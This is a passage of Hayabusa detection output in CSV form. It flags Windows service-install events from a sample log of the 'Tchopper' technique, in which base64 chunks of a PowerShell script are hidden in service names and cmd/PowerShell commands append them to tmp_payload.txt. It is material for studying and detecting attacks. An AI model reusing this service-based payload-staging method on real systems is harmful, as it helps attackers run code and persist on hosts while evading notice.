tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 